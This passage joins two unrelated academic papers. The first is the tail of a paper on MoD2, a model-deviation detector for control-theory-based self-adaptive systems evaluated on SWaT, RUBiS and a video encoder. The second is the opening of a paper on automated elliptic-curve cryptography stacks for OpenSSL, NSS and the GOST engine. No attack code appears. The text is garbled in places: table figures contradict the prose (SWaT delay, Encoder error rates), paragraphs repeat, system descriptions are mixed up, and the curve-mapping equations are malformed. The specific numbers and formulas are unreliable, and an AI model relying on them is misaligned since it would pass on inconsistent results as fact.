$w(i)$, and $v(i)$). ### 4.3 Safe region quantification Once the distribution of $B(i)$ is estimated, MoD2 has to check whether it suffers model deviation or not. We combine the nominal model listed in Equation 4 with a theoretical safe region and use a cumulative distribution function to calculate the probability that $B(i)$’s actual value exceeds the safe region. Unlike existing works that use a manual or empirical threshold, MoD2’s safe region represents the necessary condition under which the controller’s behavior is guaranteed by control theory. As a result, MoD2 would distinguish the normal executions from the abnormal ones even though the executions have not been empirically explored and makes its detection more accurate. It is the control theory, which helps developers design the original controllers, that shapes the safe regions for the derived controllers. A controller’s safe region can be captured by either formal analysis or experimental study. For PID and MPC controllers, their safe region can be theoretically derived by frequency response analysis [38, 40] and linear matrix inequality [31], respectively. How to capture a theoretical safe region is out of our scope. If it is extremely hard to capture the theoretical safe region of a complex controller, we will turn back to empirical study or statistic analysis on the execution traces. Formally, parameter $B$’s safe region $\Theta_B$ can be defined as the interval between a lower bound $\Theta^L_B$ and an upper bound $\Theta^U_B$. Given a controller’s safe region $\Theta_B$, $B(i)$’s cross-border detection can still be inaccurate due to the estimation error of $B(i)$’s value. Most existing works combine possible results in different adaptation loops to improve their accuracy, which inevitably delays their detection. MoD2’s estimated distributions of the parameter value naturally combines the past observations and avoids using multi-time detections. MoD2 uses a probability-based approach to detect $B$’s deviation with a confidence interval $CI$. The probability that $B(i)$’s value falls within the safe region $[\Theta^L_B, \Theta^U_B]$ can be calculated by a cumulative distribution function, as shown in Equation 5, where $f_{B(i)}(x)$ is $B(k)$’s probability density function. Particularly, the estimated $B(i)$’s distribution in our case is subject to a normal distribution (i.e., $B(i) \sim \mathcal{N}(\mu(i), \sigma(i))$). If the derived probability $\hat{p}(i)$ exceeds a confidence interval $CI$, MoD2 will report model deviation and trigger the switching of adaptation. $$\hat{p}(k) = \int_{\Theta^L_B}^{\Theta^U_B} f_{B(k)}(x) \, dx$$ MoD2 also uses an active detector to handle the situation when the optimal controller produces no control signal by using hypothesis testing to reveal possible model deviation. We use normal distribution to depict the variation properties (e.g., residuals) of the managed system’s output when no control signal comes and detect model deviation by checking whether the measured variation is consistent with the pre-identified distribution. ### 4.4 Discussions on MoD2 **Assumptions and limitations.** In Section 2.4 we listed our assumptions in MoD2 design. Now, we discuss the limitations brought by these assumptions, as well as the possible solutions to free our approach from these assumptions. First, we assume that the managed system’s nominal model is described as a LTI model. Our approach can be directly extended to other types of nominal models since the three major technical designs of MoD2 are independent of the types of the nominal model. Other types of models might make Kalman filter less effective due to their more complicated forms. However, extended Kalman filter [43] would alleviate this by supporting non-linear or time-variant nominal models. Second, we assume that the deviated parameter is the controllability parameter (i.e., $B$) only, and the parameter has a unary description. Since our parameter estimation on $B(k)$ requires no more than the identified value of the other two parameters (i.e., $A$ and $C$), MoD2 can also be extended to detect model deviation on one of these two parameters. However, detecting model deviation on multiple parameters is challenging and remains open. As we explained previously that $B$’s unary description is for the ease of discussion only, MoD2 can be applied to a multi-unary parameter. In fact, in our later experiments, we already run MoD2 to detect model deviation on binary parameters (with subject SWaT [8]). Third, we assume that the compensated uncertainty terms can be described in normal distributions. Though normal distribution can be applied to most types of uncertainties reported by recent literature [19, 64], our approach can adapt to other types of uncertainty models by estimating model parameter value using other filters, such as particle filter. **Parameter as stochastic variable.** To the best of our knowledge, all existing works treat the nominal model’s parameter as a deterministic variable. Different from these pieces of works, MoD2 considers the concerned parameter as a stochastic variable, which is the key to the estimation in our approach. Besides the parameter’s mean value derived through system identification, we additionally use the parameter’s variance to make our estimation robust in handling the parameter’s inherent fluctuation. Leveraging the parameter’s variance does not bring a significant burden to our approach. In fact, during system identification, such variance information is once collected but eventually overlooked. In system identification, the parameter’s value is derived based on a collection of execution traces of the managed system. Since different traces could infer different candidate parameter values, linear regression is introduced to predict a parameter value that best fits all execution traces. Conventional system identification only reports this fitted value, and the candidate values are simply discarded. However, when the nominal model’s parameter is treated as a stochastic variable, those candidates actually reflect the inherent inflection of the parameter. As such, in our MoD2, the previous fitted value is considered as the mean value of the parameter, and... We evaluate the effectiveness and usefulness of MoD2 and MoD2-deviation detection approach in the push-bottom method [23]) and timely and accurate detection of model deviation in self-adaptive software-intensive systems. RQ1 Can MoD2 timely and effectively detect model deviation for self-adaptive systems? RQ2 How useful is MoD2-based adaptation-supervision mechanism in terms of avoiding abnormal self-adaptation behavior? 5 EXPERIMENTS 5.1 Experiment setup 5.1.1 Experimental subjects. We selected three prevalent subject systems from the community of self-adaptive systems. Each subject is provided with a control theory-derived controller and a mandatory controller, both of which are either given by the subject’s developers or implemented following existing works. - SWaT, a water treatment testbed we described in Section 2. The original control theory-derived controller is inherited from the programmable logic controllers in [17]. The mandatory controller (developed following [27, 58]) keeps the tank water level between upper and lower alarm levels locally. - RUBiS, a web auction system (studied in [11, 44, 54]) that can adaptively change compression parameters to balance the throughput and video quality. The original control theory-derived controller (also from [23]) adjusts the compression parameters to achieve smooth and high-resolution video streams. The mandatory controller (also developed following [27, 58]) keeps a no-lagging video stream by decreasing the compression parameter values accordingly. - Encoder, a video compression and streaming system designed for high system utilization and low response time. The mandatory controller from [44] is tuned for high system utilization and low response time. The mandatory controller from [44] guarantees in-time response and maintains affordable system utilization. 5.1.2 Test configurations. We conducted the experiments on predefined test configurations and compare MoD2 to SWDetecter and LFM over a series of test configurations (configurations for short). Given a subject system, each configuration is a simulated system run that consists of at most one model deviation. A configuration is negative if it contains no model deviation. Otherwise, a configuration that contains one model deviation is categorized as positive. Since the subject’s controllability features (i.e., the value of B) cannot be directly manipulated, we simulate model deviation resulted from discrete behavior by changing the subject’s parameter values, and inaccurate environmental interaction by changing its environmental inputs. Specifically, a configuration is denoted by a quintuple of \((env_i, env_d, para_i, para_d, t)\), in which \(env_i\) and \(env_d\) denote the initial and deviated environmental input, \(para_i\) and \(para_d\) denote the initial and deviated model parameters, and \(t\) denotes the time point of model deviation. Initially, the subject and its running environment are reset with the initial parameters \(para_i\) and \(env_i\). At time point \(t\), the model parameter is changed to \(para_d\) and the environmental input is changed to \(env_d\). For a negative configuration, \(para_i = \ldots\) Table 2: Comparison of MoD2 and SWDetector <table> <thead> <tr> <th></th> <th>SWaT− &amp; SWaT+</th> <th>RUBiS− &amp; RUBiS+</th> <th>Encoder− &amp; Encoder+</th> </tr> </thead> <tbody> <tr> <td>MTD(s)</td> <td>4.00</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>FN(%)</td> <td>2.50</td> <td>0.11</td> <td>1.50</td> </tr> <tr> <td>FP(%)</td> <td>0.00</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>OT (time(s))</td> <td>10.00</td> <td>0.00</td> <td>0.01</td> </tr> </tbody> </table> | 200 different configurations. Table 1 describes our configurations by our-own since no existing settings available. Each group includes 200 different configurations. Notice that a positive configuration may never violate any control properties (e.g., overshoot of the water level in SWaT or fails to fulfill its mandatory requirements (e.g., overflow or underflow in SWaT). The model deviation time is measured as the subject system’s execution time after we inject model deviation. Notice that a positive configuration may never violate any control property, as we discussed in Section 2, model deviation is a necessary condition, not a sufficient condition, to the system’s abnormal behavior. 5.1.3 Evaluation criteria. We measure the timeliness by the mean time delay (MTD, i.e., the average interval between the deviation point and the detection point of a positive configuration). Notice that we only consider the correctly-detected positive configurations in MTD. We measure the accuracy by the false-negative rate (FN rate, i.e., the percentage of positive configurations that are falsely detected to be negative) and the false-positive rate (FP rate, i.e., the percentage of negative configurations that are falsely detected to be positive). Noticing that each positive configuration can be divided into a negative part (i.e., execution before the time point of model deviation) and positive part (i.e., execution after the time point of model deviation). FP also accounts for the positive configurations that are falsely detected in their negative parts. 5.1.4 Experiment procedure. We conducted all the experiments on an ECS server of Alibaba Cloud with 8 CPUs and 16GB of memory. To answer RQ1, we compare three approaches’ achieved MTD, FN rate, and FP rate on different configuration sets. We first compare the performance of MoD2 against SWDetector on SWaT−, SWaT+, SWaT−, RUBiS−, RUBiS+, Encoder−, Encoder+. We then compare the performance of MoD2, SWDetector, and LFM on SWaT−, since LFM is proposed to address the challenges of attack-induced abnormal behavior only. The SWDetector is set with two different thresholds (θ = 3σ or θ = 6σ), which are two of the suggested settings in [53]. We also study the impact of system identification, which could produce various identification values required by MoD2 (i.e., y−, W, V). We compare the performance of MoD2 with the identified values from different amounts of data (20–100%, step of 20%). We measure the usefulness by the positive configuration’s abnormal rate (i.e., the ratio of a subject system’s abnormal operation time to its suffered model deviation time). The abnormal operation time is measured as the time during which the subject system violates any control properties (e.g., overshoot of the water level in SWaT) or fails to fulfill its mandatory requirements (e.g., overflow or underflow in SWaT). The model deviation time is measured as the subject system’s execution time after we inject model deviation. Notice that a positive configuration may never violate any control property, as we discussed in Section 2, model deviation is a necessary condition, not a sufficient condition, to the system’s abnormal behavior. Figure 2: A case study on three positive configurations Table 3: Comparison of MoD2’s performance with different amounts of identification traces <table> <thead> <tr> <th></th> <th>SWaT &amp; SWaT⁺</th> <th>RUBiS &amp; RUBiS⁺</th> <th>Encoder⁻ &amp; Encoder⁺</th> </tr> </thead> <tbody> <tr> <td>identification error</td> <td>-2.5%, 3.8%</td> <td>-26.6%, 11.7%</td> <td>1.2%, 6.4%</td> </tr> <tr> <td>MTD(s)</td> <td>40.21</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>FN(%)</td> <td>0.00</td> <td>0.00</td> <td>2.00</td> </tr> <tr> <td>FP(%)</td> <td>0.00</td> <td>0.30</td> <td>3.00</td> </tr> </tbody> </table> Table 4: Comparison of the abnormal rates w/wo adaptation-supervision mechanisms <table> <thead> <tr> <th></th> <th>original</th> <th>MoD2-based</th> <th>SWDetector-based (θ=3σ)</th> <th>SWDetector-based (θ=6σ)</th> </tr> </thead> <tbody> <tr> <td>SWaT</td> <td>14.0% (162.45s)</td> <td>0.0% (0.00s)</td> <td>10.6% (114.35s)</td> <td>7.1% (71.32s)</td> </tr> <tr> <td>RUBiS</td> <td>61.1% (1953.00s)</td> <td>2.0% (60.00s)</td> <td>11.1% (398.10s)</td> <td>10.6% (386.40s)</td> </tr> <tr> <td>video encoder</td> <td>16.2% (2.92s)</td> <td>0.4% (0.08s)</td> <td>6.6% (1.19s)</td> <td>0.1% (0.02s)</td> </tr> </tbody> </table> Table 5: Comparison results of MoD2, SWDetector and LFM <table> <thead> <tr> <th></th> <th>SWaT⁺</th> </tr> </thead> <tbody> <tr> <td>MoD2</td> <td>MTD(s)</td> </tr> <tr> <td></td> <td>11.15</td> </tr> <tr> <td>LFM</td> <td>886.45</td> </tr> <tr> <td>SWDetector (θ=3σ)</td> <td>84.60</td> </tr> <tr> <td>SWDetector (θ=6σ)</td> <td>1.06</td> </tr> </tbody> </table> 5.2 Experiment Results RQ1 (effectiveness) Table 2 shows the performance of MoD2 and SWDetector for the three subjects. Considering detection timeliness, MoD2’s detecting time for model deviation varies in different subjects. The reported MTD is 40.11 seconds for SWaT, 0.00 seconds for both RUBiS and video encoder. When comparing with SWDetectors, MoD2’s achieved MTD is 185.76s smaller on average for the subjects. We notice that the two SWDetectors report similar detection delay for subject video encoder. This is because our injected model deviation would produce a severe change of the managed system’s output, which favors the SWDetector’s monitoring on the output values. As for detection accuracy, MoD2 achieves good FN and FP rate in detecting model deviation. Generally, the average FN rate of MoD2 is 0.7% (0.0%–2.0%) and the average FP rate of MoD2 is 1.1% (0.0%–3.0%). We notice that for SWaT, the reported FN and FP rate are zero. For RUBiS, MoD2’s reported FN rate is zero and FP rate is 0.3% which is caused by the active detector. MoD2 reports a 3.0% FN rate and a 2.0% FP rate for video encoder. This is caused by the difference between the selected initial estimate variance of model parameter value and its true value. Comparing with SWDetectors of different settings, MoD2’s FN rate is averagely 39.4% lower (−1.0%–100.0%), and its FP rate is averagely 25.2% lower (−0.5%–93.3%). When the SWDetector uses the best setting only (i.e., the window size is 28, and the threshold θ is 6σ), MoD2’s FN rate is averagely 33.5% lower (−1.0%–100.0%), and its FP rate is averagely 1.6% lower (−0.5%–5.2%). We notice that MoD2’s accuracy is slightly lower than SWDetectors on the subject of VideoEncoder. In this subject, the injected model deviation would immediately cause severe changes in the managed system’s output, which favors the sliding window-based approach. MoD2 sacrifices its accuracy in detecting such noticeable model deviations slightly (1.0% lower FN rate and 0.5% lower FP rate) in exchange for its accuracy in detecting covert model deviations (50.8% higher FN rate and 2.7% higher FP rate). To answer RQ2, we compare three subjects’ abnormal rate on different configuration sets with and without MoD2-based adaptation-supervision. We also implemented and evaluated two SWDetector-based adaptation-supervision mechanisms to study the role of our proposed MoD2. We measure the abnormal rate on SWaT⁺, RUBiS⁺, and Encoder⁺ respectively. Table 5 gives the experimental results on dataset SWaT⁺ (i.e., the positive configurations by injecting attacks to SWaT system). Basically, MoD2 outperforms the other three approaches (including the SWDetectors of different settings) in terms of detection timeliness and detection accuracy. MoD2 successfully detect all model deviations in a quite short time (averagely 11.15 seconds) with no false alarm. The learning-based LFM approach also achieves a good detection accuracy. However, it requires much longer time (886.45 seconds, 78.5 times longer than MoD2’s) to work. The reason for LFM’s large detection delay is that the accuracy of the trained classifier should be above a threshold of 85% to avoid false alarms. For SWDetector with a better setting (i.e., θ = 6σ), although it reports the shortest detection time (1.06 seconds) and no false alarm, it fails to detect 37.5% positive configurations, which is the worst among the compared approaches. To better demonstrate MoD2’s effectiveness in detecting model deviation, we also perform a detailed study on the positive configurations that the baseline approaches fail to give a timely and accurate detection. We list three of those positive configurations in Figure 2. The first and the third configurations are gained by injecting network attacks to SWaT, and the second one is derived by injecting manipulation disturbance to SWaT’s valves. For each of the configurations, we list the measured output value y(k) (in the first line chart) and MoD2’s estimated parameter values B̂(k) (in the last two line charts, corresponding to the two arguments in B̂(k)). We use different marked lines to denote the time of model deviation injection, the time of MoD2’s detection, the time of SWDetector’s detection, the time of LFM’s detection, and the time abnormal behavior appeared respectively. For the time of MoD2’s detection, we also mark it on the corresponding \( B_i(k) \)’s line chart, indicating which argument exceeds its safe region. For the first configuration, all of the three approaches successfully detect model deviation. However, LFM requires longer time since it has to gather multiple testing results to give an accurate detection. Such high detection delay makes LFM’s detection unfeasible since SWaT’s execution has already broken the control property (i.e., stability property) by the time it reports. For the second configuration, SWDetector’s detection is too slow to be effective since the monitored output value shows no difference from the negative configuration in the early stages. For the third configuration, both SWDetector and LFM fail to detect model deviation. Their missing detections are reasonable since this model deviation has not caused severe consequences in SWaT’s execution till the end of the execution trace. However, according to [17], this model deviation will eventually cause SWaT’s abnormal behavior if the execution is prolonged from 30 minutes to 60 minutes. Table 3 compares MoD2’s performance with different amounts of traces for identification. We also listed the variation of the identified values (i.e., identification error) used by MoD2. Generally, changing the amount of identification traces has a limited impact on MoD2’s effectiveness. The mean detection delay fluctuates in a small range (40.175–40.213 s for SWaT and 0.008–0.080 s for both RUBiS and video encoder) as the used amount of identification traces changes. MoD2 with different amounts of identification traces reports exactly the same FN and FP rate. Table 3 reveals MoD2’s stable performance. In summary, MoD2 can detect model deviation with low detection delay (average 15.37 s) and good accuracy (0.8% FN rate and 1.0% FP rate). Comparing with the baseline approaches, MoD2 achieves a smaller detection delay (average 185.76 s or 93.3% smaller), as well as a better accuracy (39.4% lower FN rate and 25.2% lower FP rate). RQ2 (usefulness) Table 4 compares the three subjects’ abnormal rates on different positive configuration sets with different adaptation-supervision mechanisms. For the subjects with our MoD2-based mechanism, the average abnormal rate is 1.2% (0.0%–2.0%). Comparing with the subjects without our mechanisms (denoted as original), the abnormal rates drop 29.2% (14.0%–59.1%) on average. This result validates the usefulness of our approach in alleviating the impact of model deviation. Particularly, our mechanism achieves a zero abnormal rate for SWaT system (i.e., prevent all model-deviation-caused severe consequences), while the abnormal rate without our mechanism is 14.0%. So even if SWaT’s optimal controllers are carefully designed and implemented by the field experts, one cannot assume that the controllers’ robustness could handle all cases of model deviation [17]. We also list each subjects’ abnormal operation time along with their suffered abnormal rates. Each subject averagely suffers 706.12 seconds abnormal operation time in each configuration without MoD2. In other words, the corresponding control-SASs fail to provide any guarantees on the subject systems’ behavior in nearly 11.77 minutes. Notice that the aforementioned abnormal operation time could be longer if model deviation has not been appropriately addressed, since the execution we collected only lasts for 30 minutes. Comparing with the two SWDetector-based mechanisms, the results reflect the importance of our MoD2 in guarding the subjects’ adaptation. Specifically, MoD2-based mechanism achieves 6.5% lower abnormal rate (3.0%–8.9%), as well as 141.87 seconds shorter abnormal operation time. We believe that MoD2 is more effective in protecting control-SASs. The result displayed in Table 4 can also partly reflect the correctness of detecting model deviation based on estimated parameter values. The abnormal rate with supervision indicates the output abnormalities prevented by our detection (1.2% on average), which echoes the low FN rate of MoD2. The abnormal rate without supervision would imply the low FP rate of MoD2, and that average 30.4% of the experimental subjects’ execution time suffers abnormalities. In summary, Our MoD2-based adaptation-supervision mechanism can alleviate the impact of model deviation on the managed system. With the support of our mechanism, the abnormal rate averagely drops by 29.2% comparing the original control-SASs and averagely drops by 6.5% comparing the SWDetector-based mechanism. 5.3 Threats to Validity One major concern on the validity of our empirical conclusions is the selection of evaluation subjects. We only use three subjects as the managed systems. This might harness the generalization of our conclusions. A comprehensive evaluation requires a full understanding of the managed systems, as well as their suitable control theory-derived controllers. This requirement restricts our choice of possible experimental subjects. Nevertheless, we believe that our selected subjects are representative of their different platforms (including network systems and cyber-physical systems) and architectures (including single controller and multiple controllers). Moreover, all of the selected subjects are widely used by other self-adaptation researchers as their experimental subjects or motivating systems. Another concern is about injecting model deviations in the positive configurations. Since we cannot directly manifest the subject system’s controllability features, we can only modify its parameters or inputs to simulate model deviation. This might make our experimental settings less realistic. To address this problem, we carefully design the injected model deviations. For SWaT, the model deviation is based on the reported physical abrasion [8] and network attacks [17]. For RUBiS, the model deviation is designed according to reported failures in web service systems [3]. And for video encoder, we use real-world video streams to simulate the model deviation. 6 RELATED WORK Control theory has been widely exploited to implement self-adaptive systems for their theoretical guarantees. Some pieces of related work use control-theoretical techniques to refine their architecture-based system model for the managed system. For example, Checiu et al. use a server request model to describe the behavior of an adaptive web service system [15]. Filieri et al. use discrete-time Markov chain model to depict service-oriented applications [22]. Some others use control-theoretical techniques to guide the design of the managing system. Konstantinos et al. [4] propose the CobRA framework for designing self-adaptive web-services, which uses model predictive control to guide the adaptation strategy of the managing system. Gabriel et al. [54] combine control-SASs and traditional architecture-based SASs by introducing discrete-time Markov chain in their PLA adaptation framework. Different from these pieces of work, the focus of MoD2 is not designing the managing system but providing self-adaptation assurances in the presence of model deviation. In other words, our work can be regarded as a complementary for them by alarming their managing system the occurrence of model deviation. Model deviation has received the attention of self-adaptation researchers since control-SASs emerged. According to control theory, the precision of the nominal model in control-SASs directly determines the effectiveness of the derived managing systems. Baresi et al. propose using a grey-box discrete-time feedback controller to support robust self-adaptation that can overcome slight model deviation [11]. Filieri et al. use continuous learning mechanisms to keep the nominal model updating at runtime [24]. Maggio et al. use Kalman filter to revise the identified nominal model by updating its state values [49]. Comparing with these pieces of works, our MoD2-based mechanism concentrates on the model deviation that would cause the managing system to violate control properties, as well as the managed system behaving abnormally. Together with these works that address slight deviation of the model parameters, we can achieve model-deviation-free self-adaptation for control-SASs. The key component of our proposed mechanism is a timely and accurate detector for model deviation, which is similar to the works on abnormal detection. Many research efforts have been contributed to both control theory community and self-adaptation community. Window-based approach is the most-widely used abnormal detection approach in control theory area [32], which is similar to the compared SWDetector approach in Section 5. Ozay et al. propose a set-membership approach to detect property violations occurring in the control system [33, 34]. For self-adaptation researchers, Jiang et al. derive invariants by observing messages exchanged between system components for robotic systems [39]. Chen et al. propose an SVM-based method to detect network attacks to SWaT system [17]. Qin et al. use context information to refine the derived invariants and combine multiple testing results to improve the accuracy of abnormal detection [57]. As we discussed in Section 2, the major difference between our MoD2 and these approaches is that we directly estimate the values of nominal model’s parameters instead of monitoring the system’s output values. By doing so, we reduce the delay time for model deviation detection. Environmental uncertainty has always been a challenge for self-adaptation researchers. Most of these works focus on uncertainty’s impact on the managed system’s state. Esfahani et al. identify internal uncertainty and external uncertainty and propose a probability-based approach to address both the positive and negative consequences of uncertainty [20]. Ghezzi et al. propose an adaptation framework to manifest non-functional uncertainty via model-based development [28]. Angelopoulos et al. also use Kalman filter to alleviate uncertainty’s impact on the estimated states of the managed system’s nominal model [4]. MoD2’s handling of uncertainty follows these works. However, the focus of our MoD2 is on the uncertainty’s impact on the nominal model’s parameters, which is addressed by our parameter deviation estimation technique. 7 CONCLUSION In this paper, we present an adaptation-supervision mechanism with the addition of supervision loop for alleviating the impact of model deviation in control-SASs. The key to our mechanism is a novel detector, MoD2, which combines different techniques, including parameter deviation estimation, uncertainty compensation, and safe region quantification, to balance the detector’s timeliness and accuracy. We conduct experiments to show the effectiveness of MoD2 and the usefulness of MoD2-based adaptation-supervision mechanism. ACKNOWLEDGMENTS The authors would like to thank the anonymous reviewers for their comments. This work is supported by Key-Area Research & Development Program of Guangdong Province (Grant #2020B010164003), Natural Science Foundation of China (Grants #62025202, #61932021, #61902173), and Natural Science Foundation of Jiangsu Province (Grant #BK20190299). REFERENCES
{"Source-Url": "https://yiqinnju.github.io/publications/FSE21.pdf", "len_cl100k_base": 13276, "olmocr-version": "0.1.50", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 44793, "total-output-tokens": 16013, "length": "2e13", "weborganizer": {"__label__adult": 0.00038909912109375, "__label__art_design": 0.0007448196411132812, "__label__crime_law": 0.00045609474182128906, "__label__education_jobs": 0.0016736984252929688, "__label__entertainment": 0.00013709068298339844, "__label__fashion_beauty": 0.00019729137420654297, "__label__finance_business": 0.0004057884216308594, "__label__food_dining": 0.00036835670471191406, "__label__games": 0.0010776519775390625, "__label__hardware": 0.001285552978515625, "__label__health": 0.0006685256958007812, "__label__history": 0.0004048347473144531, "__label__home_hobbies": 0.00013780593872070312, "__label__industrial": 0.0005741119384765625, "__label__literature": 0.0005249977111816406, "__label__politics": 0.00030994415283203125, "__label__religion": 0.00046634674072265625, "__label__science_tech": 0.145263671875, "__label__social_life": 0.00012230873107910156, "__label__software": 0.0142974853515625, "__label__software_dev": 0.82958984375, "__label__sports_fitness": 0.0002529621124267578, "__label__transportation": 0.0005164146423339844, "__label__travel": 0.0002129077911376953}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 66496, 0.04281]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 66496, 0.2703]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 66496, 0.88535]], "google_gemma-3-12b-it_contains_pii": [[0, 4848, false], [4848, 11631, null], [11631, 18268, null], [18268, 22838, null], [22838, 29169, null], [29169, 36082, null], [36082, 39272, null], [39272, 43010, null], [43010, 48787, null], [48787, 55630, null], [55630, 60003, null], [60003, 66496, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4848, true], [4848, 11631, null], [11631, 18268, null], [18268, 22838, null], [22838, 29169, null], [29169, 36082, null], [36082, 39272, null], [39272, 43010, null], [43010, 48787, null], [48787, 55630, null], [55630, 60003, null], [60003, 66496, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 66496, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 66496, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 66496, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 66496, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 66496, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 66496, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 66496, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 66496, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 66496, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 66496, null]], "pdf_page_numbers": [[0, 4848, 1], [4848, 11631, 2], [11631, 18268, 3], [18268, 22838, 4], [22838, 29169, 5], [29169, 36082, 6], [36082, 39272, 7], [39272, 43010, 8], [43010, 48787, 9], [48787, 55630, 10], [55630, 60003, 11], [60003, 66496, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 66496, 0.10127]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
b2b75991816aa3561face4f4da5e522612a4b406
Set It and Forget It! Turnkey ECC for Instant Integration Dmitry Belyavsky Cryptocom Ltd. Moscow, Russian Federation beldmit@cryptocom.ru Billy Bob Brumley Tampere University Tampere, Finland billy.brumley@tuni.fi Jesús-Javier Chi-Domínguez Tampere University Tampere, Finland jesus.chidominguez@tuni.fi Luis Rivera-Zamarripa Tampere University Tampere, Finland luis.riverazamarripa@tuni.fi Igor Ustinov Cryptocom Ltd. Moscow, Russian Federation igus@cryptocom.ru ABSTRACT Historically, Elliptic Curve Cryptography (ECC) is an active field of applied cryptography where recent focus is on high speed, constant time, and formally verified implementations. While there are a handful of outliers where all these concepts join and land in real-world deployments, these are generally on a case-by-case basis: e.g. a library may feature such X25519 or P-256 code, but not for all curves. In this work, we propose and implement a methodology that fully automates the implementation, testing, and integration of ECC stacks with the above properties. We demonstrate the flexibility and applicability of our methodology by seamlessly integrating into three real-world projects: OpenSSL, Mozilla’s NSS, and the GOST OpenSSL Engine, achieving roughly 9.5x, 4.5x, 13.3x, and 3.7x speedup on any given curve for key generation, key agreement, signing, and verifying, respectively. Furthermore, we showcase the efficacy of our testing methodology by uncovering flaws and vulnerabilities in OpenSSL, and a specification-level vulnerability in a Russian standard. Our work bridges the gap between significant applied cryptography research results and deployed software, fully automating the process. KEYWORDS applied cryptography; public key cryptography; elliptic curve cryptography; software engineering; software testing; formal verification; GOST; NSS; OpenSSL. 1 INTRODUCTION In 1976, Whitfield Diffie and Martin Hellman published the first key-exchange protocol [15] (based on Galois field arithmetic) that provides the capability for two different users to agree upon a shared secret between them. In 1985, Miller [32] and Koblitz [28] proposed public-key cryptosystems based on the group structure of an elliptic curve over Galois fields; from these works, an Elliptic Curve Diffie-Hellman (ECDH) variant arose. In 1994, Scott Vanstone proposed an Elliptic Curve Digital Signature Algorithm (ECDSA) variant (for more details see [25]). However, the main advantage of using Elliptic Curve Cryptography (ECC) is the smaller keys compared to their Galois field DH and DSA initial proposals. From the birth of ECC, which was focused on its mathematical description, the study, analysis, and improvement of elliptic curve arithmetic to achieve performant, constant-time, exception-free, and formally verified ECC implementations are clear research trends. Nevertheless, practice sometimes misaligns with theory, and by integrating theoretic works into real-world deployments, vulnerabilities arise and compromise the given ECC scheme security. Motivation. On the practice side, there is no shortage of examples of this misalignment. Brumley and Hakala [10] published the first (microarchitecture) timing attack on OpenSSL’s ECC implementation in 2009, with countermeasures by Käsper [27] and later Gueron and Krasnov [20]. But OpenSSL supports over 80 named curves, and the scope of these countermeasures is only three: NIST curves P-224, P-256, and P-521, even later augmented with formal verification guarantees [35] after patching defects [31]. CVE-2018-5407 “PortSmash” [3] finally led to wider countermeasures [42] a decade later, but small leakage persists in the recent “LadderLeak” attack [4]. Still, even if current solutions hedge against timing attacks, the question of functional correctness remains: CVE-2011-1945 from [9] is the only real-world bug attack [8] we are aware of, deterministically recovering P-256 keys remotely by exploiting a carry propagation defect. BoringSSL approaches the constant time and functional correctness issues by narrowing features, only supporting P-224, P-256, and X25519, leveraging formal verification guarantees for Galois field arithmetic from Fiat [19]. Mozilla’s NSS approach is similar, removing support for the vast majority of curves—two of which (P-256, X25519) leverage the formal verification results from HAACL’ [43], while others still use generic legacy code with no protections or guarantees. Stripping support is not a viable option for full-featured libraries, OpenSSL being one example but generally any project with even a slightly larger scope. How can these projects retain features yet provide constant-time and functional correctness confidence? Contributions. Our main contribution focuses on fully automatic implementation, testing, and integration of ECC stacks on real-world projects like OpenSSL, Mozilla’s NSS, and GOST OpenSSL Engine. Our full-stack ECC implementations achieve about 9.5x, 4.5x, 13.3x, and 3.7x speedup for key generation, key agreement, signing, and verifying, respectively. Furthermore, our flexible and applicable proposal can be easily adapted to any curve model. To our knowledge, this is the first hybrid ECC implementation between short Weierstrass and Twisted Edwards curves, which has been integrated to OpenSSL. Additionally, our methodology allowed us to find and fix very special vulnerabilities on development versions of OpenSSL and official Russian standards for cryptography. 2 BACKGROUND An elliptic curve $E$ defined over a Galois field $GF(p)$, is usually described by an equation of the following form $$E: y^2 = x^3 + ax + b, \quad a, b \in GF(p)$$ (1) called a short Weierstrass curve. Furthermore, on the curve $E$ is a pair $(x, y)$ satisfying (1), but there is also a point at infinity denoted $O$, which plays the role of the neutral element on $E$. Additionally, given a positive integer $k$, point multiplication is the computation of $k$ times a given point $P$ denoted by $[k]P$. The order of a point $P$ on $E$ corresponds to the smallest positive integer $q$ such that $[q]P$ gives $O$. In our work, we assume the cardinality of $E$ is equal to $h \cdot q$ where $q$ is a prime number with $\lg(q) \approx \lg(p)$, and $h \in \{1, 4, 8\}$. When $4$ divides $h$, there is a Twisted Edwards curve $$E_1: eu^2 + v^2 = 1 + du^2v^2$$ (2) having the same cardinality, and each point on $E_1$ maps to $E_t$, and vice-versa, using the mappings $$(x, y) \mapsto (u, v) := \left(\frac{x - t}{y}, \frac{x - t - s}{y}, \frac{x + t + s}{y}\right)$$ (3) $$(u, v) \mapsto (x, y) := \left(\frac{s(1 + v)}{1 - v} + t, s(1 - v)u\right)$$ (4) where $s = (e-d)/4 \mod p$, $t = (e+d)/6 \mod p$, $a = (s^2 - 3t^2) \mod p$, and $b = (2t^2 - t) \mod p$. Projective points on the short Weierstrass curve. We choose to work with projective points $(X : Y : Z)$ satisfying $ZY^2 = X^3 + aXZ^2 + bZ^3$ where the affine point $(X/Y, 